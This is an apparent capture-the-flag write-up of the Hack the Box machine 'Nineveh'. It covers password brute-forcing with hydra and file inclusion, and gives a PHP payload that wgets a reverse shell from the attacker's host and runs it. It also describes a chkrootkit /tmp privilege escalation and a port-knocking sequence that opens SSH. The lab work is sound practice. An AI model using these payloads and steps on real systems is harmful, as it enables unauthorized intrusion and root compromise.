Hack the Box — Nineveh

First ran the nmap recon tool on the box.

It gave the ports 80 and 443 are open.

Ran dirbuster on both of them.

Dirbuster on port 80 gave there is a folder as department which can be seen as below.

Dirbuster on port 443 shows there is a db folder.

I first observed on port 80 when I went to department there is a login page, just tried admin username and some random app says “invalid password”, so admin user is present.

Used hydra with username as admin and password list is top 10k passwords list. It gave a password.

There are some notes present in the website as below:

first I tried lfi as the url includes a file, but it looks like there is some validation on the file name as below for the length.

So removed files folder as below and tried as below

tried rfi to include php reverse shells but no luck, so went to 443 https app because in the notes it is mentioned as improve db interface.

there is a login page as below,

used hydra again with rockyou.txt but try for simple passwords we will be able to get it.

After login create a new database and create a table as below with reverse shell.

first create a file in kali as below with reverse shell from the pentest monkey.

Reverse Shell Cheat Sheet

in the table write the below code to wget the file from the kali machine, save to tmp folder and run the file.

<?php system(“wget 10.10.14.38:8000/shell.php -O /tmp/shell.php; php /tmp/shell.php”); ?>

Observe the payload entered in the below image.

Observe the path to the database, use this path to execute the shell.

listen to the port given in the reverse shell in the kali,

now in the port 80, include the file of the db created above to execute the shell.

yaay we got the shell.

we can run python shell as below:

ran linuxprivilege check script and did not find any usable things, so ran ps -eo command to see if any cronjob running any files.

the above script does is first it will run ps -eo command which gives what processes or servers being run at the moment, save it as old proc value and again run after sleeping for 1 second and compares the differences and spits the differences, so that we can see if any crons are being run.

as we can see in the above chkrootkit is present, search for exploits in kali and see the files.

There is one exploit where it says to put a file update file in tmp folder, which will be run by root.

so let’s create a reverse shell file in kali and wget the file to tmp folder in nineveh.

and add execute permissions to the update file as below:

And yaay we got root!!

for the user part there is a secret folder in the https app as given in the notes which contains a image.

download the file and run binwalk on the file to see if any other files are hided inside it as below and extract the files.

we got a ssh key, but the port 22 is not open, its filtered as below:

And also for the user there is port knock which port forwards as seen below: for that see the knockd file present in the init.d and then see the /etc/knocd.conf file which shows the config and ports to be knocked for ssh to open,

the sequence of ports are 571,290,911 for opening and closing are 911,290,571

observe the ports are knocked in sequence for opening and the ssh becomes open. use the below command:

for i in 571 290 911; do nmap -Pn -p $i — max-retries 0 10.10.10.43;done;

now login to the amrois with the private key.

now run the loop for closing as given in the config file and observe the ssh again becomes filtered.